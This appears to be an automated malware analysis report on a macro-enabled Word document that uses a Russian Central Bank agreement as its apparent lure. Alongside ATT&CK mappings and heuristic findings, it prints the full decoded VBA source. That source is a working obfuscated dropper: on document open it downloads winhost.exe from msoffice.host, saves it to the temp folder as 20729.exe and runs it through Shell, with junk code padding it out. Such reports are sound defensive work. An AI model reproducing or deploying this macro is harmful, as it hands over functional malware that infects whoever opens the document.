Verdict: MALICIOUS
Risk Score: 248
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1105 Ingress Tool Transfer
- T1204.002 Malicious File
The sample is an OOXML document containing VBA macros. The critical heuristic 'OLE_VBA_HTTP_DROP_EXEC' indicates that the VBA code downloads a file from an HTTP source and saves it to disk. The 'OLE_VBA_SHELL' and 'OLE_VBA_PCODE_AUTOEXEC_EXEC' heuristics further suggest that this downloaded file is likely executed. The document body contains text related to a Russian Central Bank agreement, which may be a lure.
Heuristics (10)
- VBA project inside OOXML [medium] (OOXML_VBA, 7 related findings): Document contains a VBA project: VBA macros present.
- Potential Shell call in VBA [critical] (OLE_VBA_SHELL). Matched line in script: `Shell hHVWpQiqNv2`
- VBA downloads and writes a file to disk [critical] (OLE_VBA_HTTP_DROP_EXEC): VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning. Matched line in script: `dA3BGSOFn.Write U9SpqCLxntTo3GJ.responseBody`
- CreateObject call [high] (OLE_VBA_CREATEOBJ). Matched line in script: `Set dA3BGSOFn = CreateObject("adodb.stream")`
- VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Document_Open macro [low] (OLE_VBA_DOCOPEN). Matched line in script: `Sub Document_Open()`
- Workbook_Open macro [low] (OLE_VBA_WBOPEN). Matched line in script: `'Sub Workbook_Open()`
- Environ() call (env variable access) [low] (OLE_VBA_ENVIRON). Matched line in script: `path = Environ("temp") & "\20729.exe"`
- Suspicious extracted artifact [info] (EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info] (EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL https://msoffice.host/winhost.exe (referenced by macro)
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 16411 bytes |

SHA-256: dd594a57d01d4b7f1fe77d13737b992496442be61a1980a83d9b78239139ba37
Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely. 327 of 460 identifiers look randomly generated (e.g. 'Z7n14v2SHlGPiwk9g'), consistent with name-mangling obfuscation.

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Open()
If 939 - 35 = 14495 / 1115 Then
UmaW34FE2CdbQI = "C2p6Ld1Blrw7PzW"
End If
NRPkzmVq8uK = 22641
xQEujIvpURl5 = UmaW34FE2CdbQI & NRPkzmVq8uK
If 149 + 29 = 7620 / 508 Then
s0yYhIdG1wefcQu = "OKN5tT7OZqP"
End If
j8nEjHiwz6pQqX = "FElTm0f2UnRp3MH"
o62GBfU5pHWSl4r0e = s0yYhIdG1wefcQu & j8nEjHiwz6pQqX
If 46 < 140 Then
' Qb20jIhM8V
Else
' PhM1aSOHr
MsgBox "icHDZ0ugsax"
End If
main
End Sub
Sub Document_Close()
If 54 < 252 Then
' Qv0ZYltif3KHCr
Else
' uoLykeTlW
Debug.Print "HKu17JP4VDY"
End If
Dim QnO8QkI9btL
QnO8QkI9btL = 169
While QnO8QkI9btL < 452
QnO8QkI9btL = QnO8QkI9btL + 11
Wend
s7LyaURJuX4VYqit = 31649
bGqT53n8AFBS = ROrHwqmy2 & QnO8QkI9btL
If 41 < 248 Then
' gpjkgiET1
Else
' n1fRpMzkU8nuv5w
Debug.Print "Ki36Wre15zQSU"
End If
End Sub
Attribute VB_Name = "frVc5K7Wdpit"
'Sub Workbook_Open()
Sub main()
If 204 - 20 = -2012 + 2023 Then
voS7ybcQl3 = "dYCW4D07qtR9Zsa"
End If
b64GxtZ18 = 11300
hcUuOXpvmPN1 = voS7ybcQl3 & b64GxtZ18
If 204 - 20 = -2012 + 2023 Then
b5NthjG7qL4DP = "z0azO7ZVdDY"
End If
amHqKDftyvu0QG = 11300
vs0f9vWO2nS6Lk = b5NthjG7qL4DP & amHqKDftyvu0QG
If 30784 / 104 = 9150 - 9148 Then
GoaAnHrCLJ80eW = "Pvf3R9N8GB"
End If
hxsauD489vOer = 40433
gmeMBiHIaAzK8b = GoaAnHrCLJ80eW & hxsauD489vOer
Dim mX6ie3bHx5Edusjk
mX6ie3bHx5Edusjk = 237
While mX6ie3bHx5Edusjk < 567
mX6ie3bHx5Edusjk = mX6ie3bHx5Edusjk + 56
Wend
PdF97nrUeZ = 36410
X1noryxaHi = SDaBVxWd6pZQy5Mk & mX6ie3bHx5Edusjk
If 5536 / 8 = 23229 / 2581 Then
C2DF8dNoW53 = "pFfn0N6dr"
End If
PvOU1lHZo7WTj = "EJsS86LDxYM"
KSDy1eJaZ4pjt = C2DF8dNoW53 & PvOU1lHZo7WTj
If 767 - 10 = 23024 / 5756 Then
go4IaOwhJ = "ofMUGTl062I"
End If
sWybfV2a1rzsIvHX = 21459
bNJltvOPGwS3nF = go4IaOwhJ & sWybfV2a1rzsIvHX
If 13440 / 21 = -1615 + 1625 Then
mh7dsnMIz1Ek84 = "a8RcBWAQjEqKT"
End If
eFE8qUlfT = "rlHwEDTVi7tL"
gnSh7wsDL6G5Vv = mh7dsnMIz1Ek84 & eFE8qUlfT
If 13440 / 21 = -1615 + 1625 Then
EEh1AKNqdTUDu = "wquOYkJUMzmWo8C"
End If
GJLfAYPMiWO1 = "XbMuCFTR5ht"
ixQEVBZov = EEh1AKNqdTUDu & GJLfAYPMiWO1
Dim QCNJFfndIDY9ptyB
QCNJFfndIDY9ptyB = 177
While QCNJFfndIDY9ptyB < 842
QCNJFfndIDY9ptyB = QCNJFfndIDY9ptyB + 1
Wend
KSgGzc1qI4XUnwkA = "TuGsWVoXPt1Qy"
mdcl5JUPahBG = aFGLCj4VR & QCNJFfndIDY9ptyB
If 16 < 216 Then
' Sr9gylLSxvQE5dJN
Else
' xVqMiWjCxEa
MsgBox "aNj8yVRA1PdJBM"
End If
Dim AMN3j2YkFt6xS5g
AMN3j2YkFt6xS5g = 245
While AMN3j2YkFt6xS5g <= 345
AMN3j2YkFt6xS5g = AMN3j2YkFt6xS5g + 54
Wend
D2m6Ba9KbYFyO = 23071
Zse4jioLgxW9mh1u = AxH3sh10aGCQN & AMN3j2YkFt6xS5g
Dim tJ0d9BVbvXq
tJ0d9BVbvXq = 245
While tJ0d9BVbvXq < 345
tJ0d9BVbvXq = tJ0d9BVbvXq + 54
Wend
pTu6ck0NbmVKzeDl = 23071
g0nMWyHZdJCNDXP = Eq5XjISihk4N0L6 & tJ0d9BVbvXq
If 47 < 215 Then
' QG5Y9TOSpnNqu
Else
' ROEqkRNnm
MsgBox "aX1qrMnHLEivy"
End If
If 47 < 215 Then
' ZNHJ0LICPZY9v
Else
' QoRe4f1D2PYlIdz
MsgBox "Vx40BE3OTc2SmN6"
End If
If 8 < 202 Then
' j1EiFoVDYsrl
Else
' nuV23SGt16Ibm
MsgBox "QeiaTVrmM"
End If
Dim Z7n14v2SHlGPiwk9g
Z7n14v2SHlGPiwk9g = 110
While Z7n14v2SHlGPiwk9g <= 725
Z7n14v2SHlGPiwk9g = Z7n14v2SHlGPiwk9g + 44
Wend
JQYj3XsyLC0z = 17933
i7EHGuB3vUdWR = Bf1gtYdyCuPJa & Z7n14v2SHlGPiwk9g
If 50 < 154 Then
' N1xN7j2SpFrm6LMa
Else
' I846sFZOmANb
MsgBox "l9brqletQCiK"
End If
Dim ZebBWzE5dJCxk0
ZebBWzE5dJCxk0 = 219
While ZebBWzE5dJCxk0 < 432
ZebBWzE5dJCxk0 = ZebBWzE5dJCxk0 + 51
Wend
XoNbHyhpP0ScJldzI = 47833
ctYJXiQmvbzj2c = UNkToOGB5Wv3VbSAd & ZebBWzE5dJCxk0
If 317 - 171 = 1237 - 1227 Then
cGwOaRzqQ3 = "Q3lkMg6LaHc402j"
End If
as7EytinH6 = 59584
u3Xd9fwZFzP5o = cGwOaRzqQ3 & as7EytinH6
If 317 - 171 = 1237 - 1227 Then
HraWhkY63 = "fEKMj67PpZI"
End If
vb9BQEiS1pNzZHj6l = 59584
y7tmYI6r5JZkWvibq = HraWhkY63 & vb9BQEiS1pNzZHj6l
If 878 + 9 = -1306 + 1322 Then
G89nT1IFPi = "neorDZgiVvjtGM"
End If
l7EV3y0TbvnN1aC6 = 53363
gwfIi6jSdrR = G89nT1IFPi & l7EV3y0TbvnN1aC6
If 49 < 210 Then
' vKwRh1cmaA
Else
' xMgkJnpQD
Debug.Print "xpQq2Wln4Gs5jaZ"
End If
If 46 < 247 Then
' nGNz4Hqt3JPsbgU5o
Else
' xlm7ov9pXi0qr4E
MsgBox "NJ2qrUVyLKA"
End If
Dim t0n7lfo5CtBZLRS
t0n7lfo5CtBZLRS = 166
While t0n7lfo5CtBZLRS <= 516
t0n7lfo5CtBZLRS = t0n7lfo5CtBZLRS + 21
Wend
v0qxIPUmVN57ZA = 24444
Nzs4lUfOnwXWiVc = duXfUMh0xCSye9wkG & t0n7lfo5CtBZLRS
If 13 < 246 Then
' bIFTSvJgihap7R
Else
' L5yAmY4OhPs1d
MsgBox "kaU1EpDgcseFr752"
End If
If 13 < 246 Then
' T3ntfQd0coY
Else
' DBCtW5xu4TU
Debug.Print "TfOdBN7EGLnarS"
End If
If 48 < 237 Then
' RctJ74OTQkB
Else
' EB7XGUyMjR8bl
Debug.Print "ZJoZeF8tjVzs3"
End If
Dim dWbdDnRlUZ6
dWbdDnRlUZ6 = 219
While dWbdDnRlUZ6 <= 838
dWbdDnRlUZ6 = dWbdDnRlUZ6 + 13
Wend
FpBmcQEtz = "NrkKRzafNLps"
pJiHW4wEN = iXrQvxp8c9CVRST & dWbdDnRlUZ6
If 21090 / 38 = 24345 / 4869 Then
orlu6DbopCsd = "q6ky5wln7Jsg"
End If
rvMTGh0YVw = "LeOBDxWUK"
zgZlT85cUL = orlu6DbopCsd & rvMTGh0YVw
Dim m7D12Nzh0rCT
m7D12Nzh0rCT = 161
While m7D12Nzh0rCT < 838
m7D12Nzh0rCT = m7D12Nzh0rCT + 62
Wend
NjfFE5C6r = 59536
p5vidNfE1 = xIBwZnMy6HPe9t & m7D12Nzh0rCT
Dim K1HasfMiA
K1HasfMiA = 98
While K1HasfMiA <= 857
K1HasfMiA = K1HasfMiA + 11
Wend
W8WYeMiTyFPp1mI = 38501
gf52oURlecysLj = eTrtIg9wOmSZf & K1HasfMiA
If 73 + 94 = -2114 + 2117 Then
Xikqz3JFgLbh15m = "n3YPdXKihLMx0"
End If
Q83ASoqcHu = "sBALHqrVa"
NkD0cifoGmJL = Xikqz3JFgLbh15m & Q83ASoqcHu
If 62 < 134 Then
' IAxXasWmfhF3NrKd
Else
' xholxz1Zeq29a
MsgBox "LJDOerbzpvf0s"
End If
Dim Lq4kX61oUTziMgH
Lq4kX61oUTziMgH = 228
While Lq4kX61oUTziMgH < 734
Lq4kX61oUTziMgH = Lq4kX61oUTziMgH + 22
Wend
vOQJgpjlI = "iGMaoNW62C5"
TSNMZCyA4b7su58 = RBVLW0Dxd4kaG & Lq4kX61oUTziMgH
Dim fsoZVGmQR
fsoZVGmQR = 16
While fsoZVGmQR < 812
fsoZVGmQR = fsoZVGmQR + 61
Wend
Tnhw5dkCORTeQ = "oLJn68cQu9i1yT"
DEtAdZDlHbx0vm9Q = CdAZxnEjmbkg5R & fsoZVGmQR
If 16536 / 53 = 28392 / 7098 Then
wd1CjU7erN8 = "WLPaTOc2ku9p"
End If
pBxpL3KvT0ED2aVw = 41511
tgJ9dVWAu0qMbcD = wd1CjU7erN8 & pBxpL3KvT0ED2aVw
If 16536 / 53 = 28392 / 7098 Then
c8WAhx2eFdnV = "ivDxBF4lYc1pgoS"
End If
c9DJ14OoLmTH7g = 41511
e5hjsWQCo = c8WAhx2eFdnV & c9DJ14OoLmTH7g
Dim pRQNr0tIUYPMGwHB
pRQNr0tIUYPMGwHB = 2
While pRQNr0tIUYPMGwHB < 923
pRQNr0tIUYPMGwHB = pRQNr0tIUYPMGwHB + 48
Wend
j9OxlJkZSKQa = 13956
J8FUlcLKofN = TtLzjPuIS & pRQNr0tIUYPMGwHB
If 444 + 40 = -835 + 842 Then
xzg5TGtYsNu = "YtgiTZlUkc"
End If
a9oaAJ6CU = 13956
a6vo2741RdSlCAQsu = xzg5TGtYsNu & a9oaAJ6CU
Dim s9vUxI2i8dKQTYAO
s9vUxI2i8dKQTYAO = 206
While s9vUxI2i8dKQTYAO < 587
s9vUxI2i8dKQTYAO = s9vUxI2i8dKQTYAO + 19
Wend
V6YHXkLKae0dJg78A = "vb4gQeDM9jU7FvZN1"
zawNfYeBopK47LkU = OeiEkS6AquGcJIZn & s9vUxI2i8dKQTYAO
If 1002 + 13 = -1344 + 1358 Then
dRvXf9Ed8ogyO5hC = "SveSzqBu19NMoAC"
End If
cfSdtGIrXoqZgpWm = 8017
qMq5SPnU0KTOwDNb8 = dRvXf9Ed8ogyO5hC & cfSdtGIrXoqZgpWm
Dim VVHpXrYztDxTig
VVHpXrYztDxTig = 119
While VVHpXrYztDxTig < 561
VVHpXrYztDxTig = VVHpXrYztDxTig + 1
Wend
rlXe1IRLgh8DQC = "bUFJ2OcaCmXNur7e"
rOC3kKTB6IRaq = Ga2PMWHl1 & VVHpXrYztDxTig
Dim yLUp6t3mqjcRfa0zK
yLUp6t3mqjcRfa0zK = 104
While yLUp6t3mqjcRfa0zK <= 345
yLUp6t3mqjcRfa0zK = yLUp6t3mqjcRfa0zK + 3
Wend
u3t6ZfJwVlOYMi = "RDkLjVPxd"
Z4OqCwWhrfc1SVmk = WqnxspbEr8 & yLUp6t3mqjcRfa0zK
If 18 < 182 Then
' hlq75wdhtE
Else
' zWlqUAaD1yRfp
Debug.Print "p23C9fFA5yQ"
End If
If 18 < 182 Then
' bAM1OPb4iNsuvjeF2
Else
' AnkQGD2Bx7
Debug.Print "SD9YWAouawSkKGM"
End If
Dim khmWqgLU6CAjDtYFw
khmWqgLU6CAjDtYFw = 225
While khmWqgLU6CAjDtYFw < 478
khmWqgLU6CAjDtYFw = khmWqgLU6CAjDtYFw + 64
Wend
n3u7IQGNc = "GCwgisukS5896h"
omTJlba7e9XM = lDtT10fk4a8v & khmWqgLU6CAjDtYFw
Dim DzhUQvc07L
DzhUQvc07L = 143
While DzhUQvc07L < 630
DzhUQvc07L = DzhUQvc07L + 48
Wend
xKHYvlJ3uSi = 2592
bY3a1cfiE = djVBaCYkS3md9lJKr & DzhUQvc07L
If 2040 / 3 = 885 - 870 Then
DkrtEcoR27fi4 = "KLB0Z5FmreCVji"
End If
tktQqNazi4 = "ssQTOoHqSpBRcI"
qWv7sUYl1 = DkrtEcoR27fi4 & tktQqNazi4
If 2040 / 3 = 885 - 870 Then
PafmJScOYxDP7M2 = "nCWXZL4UtT1Daf"
End If
MV3HOqw4iZatg = 43720
rfBNHVQyX0x = PafmJScOYxDP7M2 & MV3HOqw4iZatg
Dim h5Nv8bhcZRH6Piw9
h5Nv8bhcZRH6Piw9 = 163
While h5Nv8bhcZRH6Piw9 < 746
h5Nv8bhcZRH6Piw9 = h5Nv8bhcZRH6Piw9 + 35
Wend
AOgSrUh85bWQX = "MjmtpHgMaTRoW7Vq"
jXTNiUJG6C4f = utxnLOS9By5ei1ZwD & h5Nv8bhcZRH6Piw9
If 18901 / 41 = 11708 / 2927 Then
OEy7CVRepTwzsH4m = "nhV0bjJT3f8"
End If
y5SXOcCtq9UbJ4V = "QB4KrwzRNpj"
sSyheBAUzaJZ5O8 = OEy7CVRepTwzsH4m & y5SXOcCtq9UbJ4V
If 766 - 19 = 5027 / 457 Then
L3A5d827u = "hHSQ7vZFmrz2O"
End If
bE3D0r7JGkNlWZw = 38742
v8QvNifSKXyuYwJB = L3A5d827u & bE3D0r7JGkNlWZw
If 63 < 175 Then
' qy3H6Wpi8
Else
' VuE9PUSsJnmoWb0kK
Debug.Print "BFnkjSqyVTKQJaEw"
End If
If 12 < 207 Then
' nes9SyGCT3NIEnioq
Else
' Of5labWHmyD
MsgBox "IIwqxvZkGs"
End If
Dim dSAFiHK80JN5gYcU
dSAFiHK80JN5gYcU = 12
While dSAFiHK80JN5gYcU <= 548
dSAFiHK80JN5gYcU = dSAFiHK80JN5gYcU + 3
Wend
ithmT8ExzXj41FN = 2213
OukOfpohl = g6SUCFKPWkyshVA & dSAFiHK80JN5gYcU
Dim ZYloWNq4sj
ZYloWNq4sj = 237
While ZYloWNq4sj < 341
ZYloWNq4sj = ZYloWNq4sj + 38
Wend
Cgj1a2GJw40tFUHCb = "nVTDHSc3tewj"
jrdceX4ZWSOsyJ5iV = z9taXhD1zjuC2pfe & ZYloWNq4sj
If 801 - 11 = -8924 + 8927 Then
bqzJyuMkUfSQrLO = "hpz0eTkWF"
End If
FbeEDXPJWcIv9ljm = 29304
a6nreuhtTYxH1 = bqzJyuMkUfSQrLO & FbeEDXPJWcIv9ljm
Dim isifuQemktabPMg0
isifuQemktabPMg0 = 199
While isifuQemktabPMg0 < 298
isifuQemktabPMg0 = isifuQemktabPMg0 + 39
Wend
DM69mabL4TYqpHj = "l3XuzjVaOL"
A3vPaLXH0Ch = TnqKgSQVMlp0A & isifuQemktabPMg0
Dim TWU0KVFIius
TWU0KVFIius = 199
While TWU0KVFIius < 298
TWU0KVFIius = TWU0KVFIius + 39
Wend
PgsMfqWyDox5 = "ayAH716skPTR"
A6dObHPnrFYqCN72f = dnX4WTOpxUtbw10s & TWU0KVFIius
Dim YAw9uxyQG
YAw9uxyQG = 244
While YAw9uxyQG < 263
YAw9uxyQG = YAw9uxyQG + 31
Wend
MTJDvhGYHFgoWflB6 = 64890
GXnSbwMCKI8Diopr = d2NmU7i6LQ & YAw9uxyQG
path = Environ("temp") & "\20729.exe"
BLyc024BsnIqioW "https://msoffice.host/winhost.exe", path
If 27 < 236 Then
' ytvUkX3Baeu8
Else
' g4PsJkfVA
MsgBox "A9AfZeYUdg1Lsm3p"
End If
Dim wYBSHvzy7CAOTqs
wYBSHvzy7CAOTqs = 110
While wYBSHvzy7CAOTqs <= 289
wYBSHvzy7CAOTqs = wYBSHvzy7CAOTqs + 11
Wend
qEJzsN8GqZ = "J4F7EMUGRViLDXlaZ"
kjKxhgSW97aN03 = aQ6Tu4SwDE3zL8h & wYBSHvzy7CAOTqs
If 22880 / 130 = 13793 / 1061 Then
Ir4KxJiTXcB7un = "Cpb4QUoEqgxmC2I6"
End If
wuQkmWXEeftBjpCV = "tPfDAONHd1lLtFB"
YWpylbMrkZ6Dif = Ir4KxJiTXcB7un & wuQkmWXEeftBjpCV
If 22880 / 130 = 13793 / 1061 Then
WHKgr38Tc = "AiQqWFmc3JYu18"
End If
S7lFvtIkc4qS = 10144
OhwrIPfZyqK = WHKgr38Tc & S7lFvtIkc4qS
Dim oDtlSYCsX5cTqnBi0 As Object
If 1 * 148 = 17800 / 3560 Then
Pfe5JmRYlKEp1CQ = "Mji9VCl0XW"
End If
edPbLizjW = "UipCxn8cHYZO"
u3wpMRkJZQt9zao = Pfe5JmRYlKEp1CQ & edPbLizjW
Set oDtlSYCsX5cTqnBi0 = New frmMain
If 11 < 210 Then
' CNUivYxSXzF6jL0M
Else
' Wln1qFyT6XJERrf
Debug.Print "ICvdx5YO1"
End If
If 11 < 210 Then
' JVcFq4o7WSus9ny
Else
' lu3zCP015XWOn
Debug.Print "YhkbJ0SIg3"
End If
oDtlSYCsX5cTqnBi0.hello path
End Sub
Attribute VB_Name = "DxoSn0F7BEhYJ"
Public Function BLyc024BsnIqioW(ByVal rar0MEfPtZAK$, ByVal RIkvxta5XBosg$)
Dim LIwBLG7tar3
LIwBLG7tar3 = 181
While LIwBLG7tar3 < 891
LIwBLG7tar3 = LIwBLG7tar3 + 44
Wend
ErLNxFUXOl = "Qq0KPpRzi"
HAMgXbsykG = Urc2Bh8VonXySejF & LIwBLG7tar3
If 8559 / 9 = -2162 + 2163 Then
u8gwGbX9CdF6YTZH = "JB7HbIqpNRU"
End If
Oyt1XDibugrm0P23 = "BB5fElL1TQY0"
csyPAM7mg2cfehn = u8gwGbX9CdF6YTZH & Oyt1XDibugrm0P23
If 33 < 203 Then
' OE8jluiM3b
Else
' ekjIJKbSQE4Olhw
Debug.Print "seOgFoDAUZnKG96uw"
End If
Dim anfz7uRd8H
anfz7uRd8H = 100
While anfz7uRd8H < 595
anfz7uRd8H = anfz7uRd8H + 35
Wend
oCd8GHBPN4Oe2Z9S = "h2ygTqi0a"
F6R1NVj3dUMKq5 = ZftaXsgbOhIvH4 & anfz7uRd8H
Dim LsGH29OR1
LsGH29OR1 = 100
While LsGH29OR1 < 595
LsGH29OR1 = LsGH29OR1 + 35
Wend
kYa16Ulip2 = "gLsmlYiaZQTo"
vIzQdH8ltepo3bvi = d98dR4k62elqS & LsGH29OR1
If 54 < 173 Then
' VzZFBbG0u
Else
' CKyq52i7Wo
Debug.Print "E3HhqNZbDIY"
End If
If 44 < 187 Then
' fcYCJ8T130DrGyB
Else
' er8ByAPgI45m
MsgBox "oRE4p9XzyVu"
End If
Dim I9LV2n7Rh
I9LV2n7Rh = 117
While I9LV2n7Rh < 946
I9LV2n7Rh = I9LV2n7Rh + 14
Wend
fzi15pEbPuf7RUrnD = 21283
L7IX1N0ntMHcQVsq = SUTZl92nv & I9LV2n7Rh
If 49 < 131 Then
' blpajcoU45V
Else
' umybWAfZp4
Debug.Print "xlWqsgz8FJfa7Mwpu"
End If
If 26 < 178 Then
' adoYUv4ZNi0ujxLD
Else
' X8l9c4fnvS
Debug.Print "cPbTeFSBDQvtO5zEM"
End If
If 26 < 178 Then
' bJ1u7l60Lf3VGm8jD
Else
' UOGJrblWkwedcq
MsgBox "fySfk6KAzUleTM"
End If
Dim Cp7Ys4nOH
Cp7Ys4nOH = 100
While Cp7Ys4nOH < 270
Cp7Ys4nOH = Cp7Ys4nOH + 9
Wend
QPNphYv1L = 9863
TnEzPDhWQ0tC1vsm = F4oMQ6GgU0 & Cp7Ys4nOH
If 16 < 179 Then
' lms0cMyTkE
Else
' EdvZPnpl3GzDyO
Debug.Print "b7KlzTr8CG1"
End If
If 2616 / 3 = 10140 / 780 Then
UxpgvSNc3yQounCE = "RpQJMzNIKqyr"
End If
gOUIhVB5F29SNe = "ePpR9is1wkomGUa"
OET0MUOC4RWyl3QdZ = UxpgvSNc3yQounCE & gOUIhVB5F29SNe
If 31 < 138 Then
' B9ihp0vyEPGLXeHxC
Else
' ZBIR7KZzWA3H9PV
Debug.Print "MOjI52Mtrw4v"
End If
Dim mNVjQmJglfypb
mNVjQmJglfypb = 132
While mNVjQmJglfypb < 854
mNVjQmJglfypb = mNVjQmJglfypb + 21
Wend
P2tmRhZSnj = 48618
jUk6mqEYs0fv = MoMtOscK4we & mNVjQmJglfypb
If 570 + 39 = 6299 - 6295 Then
RcgGStbjC1BU = "xEvOS1cAtQf"
End If
VXIw7fRWFosTvkY = 48618
pAwCrshuLJRDaEG = RcgGStbjC1BU & VXIw7fRWFosTvkY
If 23 < 201 Then
' f3KPRQa9vC5Ngu
Else
' IrMVf5iRydWgK
MsgBox "iI86sRUaYXzP1C"
End If
If 23 < 201 Then
' kinLl1G49qg
Else
' zOy2mXYFUk0d9tP
Debug.Print "UhqoECTpiLSRc"
End If
Dim U9SpqCLxntTo3GJ As MSXML2.XMLHTTP60
Set U9SpqCLxntTo3GJ = New MSXML2.XMLHTTP60
U9SpqCLxntTo3GJ.Open "GET", rar0MEfPtZAK$, False
U9SpqCLxntTo3GJ.Send
If U9SpqCLxntTo3GJ.Status = 200 Then
If 19 < 225 Then
' Ngh2TDw4fpyXeq
Else
' ThIZBOCJf
MsgBox "OgYwxakWZ5V28u"
End If
Dim vyealI82b
vyealI82b = 253
While vyealI82b <= 684
vyealI82b = vyealI82b + 61
Wend
ZXyhUL2PHMS = 60714
Kt1U4pqkOPc = u86ZnD1KTgB & vyealI82b
Set dA3BGSOFn = CreateObject("adodb.stream")
If 22 < 235 Then
' NJ36Nsmzy
Else
' KqelmzPgY7W
MsgBox "pNqdg2VMLlRWQXK"
End If
dA3BGSOFn.Type = 1: dA3BGSOFn.Open
Dim lewcKg5k3siE
lewcKg5k3siE = 147
While lewcKg5k3siE <= 524
lewcKg5k3siE = lewcKg5k3siE + 63
Wend
bcqzbei5Ng = 30953
MGZiSrXMvIA = uPBSGxMdDeO & lewcKg5k3siE
dA3BGSOFn.Write U9SpqCLxntTo3GJ.responseBody
If 64 < 161 Then
' tUukGIPJha2b
Else
' NBIbPQTlS
MsgBox "OlGOUMQ0q8K"
End If
Dim lL6oz4TAePmjvBKlS
lL6oz4TAePmjvBKlS = 55
While lL6oz4TAePmjvBKlS <= 261
lL6oz4TAePmjvBKlS = lL6oz4TAePmjvBKlS + 14
Wend
j5aAgJZ70KB = "Xa7CdxpmOGK"
nPVMHA85pWamt = OFCxfnSMk & lL6oz4TAePmjvBKlS
Dim cb9kmfaFyKJc
cb9kmfaFyKJc = 15
While cb9kmfaFyKJc <= 647
cb9kmfaFyKJc = cb9kmfaFyKJc + 20
Wend
kueCA28d1rWfZ5cQD = "nDHor3GvLfaTI46"
fwAVj3yrtJHPOMfo = QOKnhUmYH & cb9kmfaFyKJc
If 22 < 253 Then
' CuXhLs31UizQP6p
Else
' ANonmvtReGE
MsgBox "IeYOgyLvrhB0nQ"
End If
dA3BGSOFn.SaveToFile RIkvxta5XBosg$, 2
If 36 < 234 Then
' oXpVu5NIyo
Else
' F5shXZqjbM6TBfOIW
MsgBox "cX2UpL0EKCW"
End If
If 30 < 170 Then
' xXUZEYTF7Ppe2Dats
Else
' aZTQzpgtR
MsgBox "lMnr8NwCp"
End If
If 30 < 170 Then
' TQjYvENVDb
Else
' cA7UZwn8P
Debug.Print "x08zMHYI5bD"
End If
dA3BGSOFn.Close: Set dA3BGSOFn = Nothing
End If
Dim WvpL4YQgyzFtn3
WvpL4YQgyzFtn3 = 202
While WvpL4YQgyzFtn3 <= 831
WvpL4YQgyzFtn3 = WvpL4YQgyzFtn3 + 10
Wend
I7aednM3r4KwVLyP = 58923
kVa5iXzn1pRG2c4 = JhSdbRMv3UZ & WvpL4YQgyzFtn3
If 573 - 19 = 2351 - 2341 Then
mFkEXCmqyIn = "GMBTEnPfH9"
End If
RvVed6rZFns = "k7Ir2JXqGhdEy"
K5cX2nZIib = mFkEXCmqyIn & RvVed6rZFns
Set U9SpqCLxntTo3GJ = Nothing
End Function
Attribute VB_Name = "frmMain"
Attribute VB_Base = "0{E3AD96BE-6CE3-4777-A377-C84F06DA5BF3}{5E25C0BD-621B-43A3-BDB3-A31AFF284BBA}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub UserForm_Initialize()
' Initialize
Me.Caption = ""
End Sub
Public Sub hello(hHVWpQiqNv2)
Shell hHVWpQiqNv2
End Sub

| Filename | Kind | Source | Size |
|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 54784 bytes |

SHA-256: 0a68d63879a2f54f2e2600209481e7134872bb3d09005994ea7a1571cbbb3dc5
Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely. 623 of 1056 identifiers look randomly generated (e.g. 'aW9uIHVsbGFtY28gbGFib3JpcyBuaXNpIHV0IGFs'), consistent with name-mangling obfuscation. Carved artifact contains 2 long base64-like blob(s).